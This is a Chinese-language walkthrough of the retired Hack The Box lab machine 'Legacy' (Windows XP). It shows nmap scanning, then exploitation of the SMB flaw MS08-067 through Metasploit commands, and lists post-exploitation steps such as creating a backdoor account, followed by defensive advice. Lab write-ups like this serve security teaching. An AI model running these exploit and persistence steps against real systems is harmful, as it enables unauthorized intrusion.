HTB:Legacy 渗透测试
字数 1106 2025-08-15 21:34:01
HTB: Legacy 渗透测试教学文档
1. 靶机概述
- 平台: Hack The Box (HTB) - 在线渗透测试平台
- 靶机名称: Legacy
- 状态: 已退役
- 操作系统: Microsoft Windows XP
- IP地址: 10.129.61.196 (注意:退役靶机的IP可能与信息卡不一致)
2. 信息收集阶段
2.1 初始扫描
使用nmap进行基本扫描:
nmap -sV -O -A 10.129.61.196
2.2 扫描结果
| 端口 | 状态 | 服务 | 版本信息 |
|---|---|---|---|
| 139/tcp | open | netbios-ssn | Microsoft Windows netbios-ssn |
| 445/tcp | open | microsoft-ds | Microsoft Windows XP microsoft-ds |
关键发现:
- 开放了SMB服务(445端口)
- 操作系统为Windows XP(已过时,可能存在已知漏洞)
3. 漏洞探测
3.1 使用nmap脚本扫描漏洞
nmap --script=vuln -p 445 10.129.61.196
选择--script=vuln参数的原因:
- 直接查找常见漏洞
- 比searchsploit更便于筛选所需漏洞
3.2 潜在漏洞分析
Windows XP的SMB服务可能存在的漏洞:
- MS08-067 (NetAPI漏洞)
- MS17-010 (永恒之蓝)
- 其他SMB相关漏洞
4. 漏洞利用
4.1 使用Metasploit框架
- 启动msfconsole:
msfconsole
- 搜索相关漏洞模块:
search ms08-067
- 选择并配置攻击模块:
use exploit/windows/smb/ms08_067_netapi
set RHOSTS 10.129.61.196
set LHOST [你的本地IP]
- 执行攻击:
exploit
4.2 替代方法尝试
尝试使用MS17-010(永恒之蓝)攻击:
- 未成功(原因可能是目标系统未受此漏洞影响或配置问题)
- 参考链接:MS17-010分析
5. 后渗透阶段
成功利用后:
- 获取系统shell
- 查找并读取flag文件
- 进行权限维持(如创建后门账户等)
6. 关键学习点
- 老旧系统风险:Windows XP等过时系统通常存在已知漏洞
- SMB服务安全:SMB协议历史漏洞多,是常见攻击向量
- 方法论:
- 信息收集 → 漏洞探测 → 漏洞利用 → 后渗透
- 多种攻击方法尝试(主攻失败时有备选方案)
- 工具使用:
- nmap的高级扫描技巧
- Metasploit的模块化攻击流程
7. 防御建议
针对此类漏洞的防护措施:
- 及时更新和修补系统
- 关闭不必要的SMB服务
- 在网络边界限制SMB端口(139,445)的访问
- 使用入侵检测系统监控异常SMB流量
8. 参考资料
- HTB平台
- MS17-010分析文章
- Metasploit官方文档
- Nmap脚本使用指南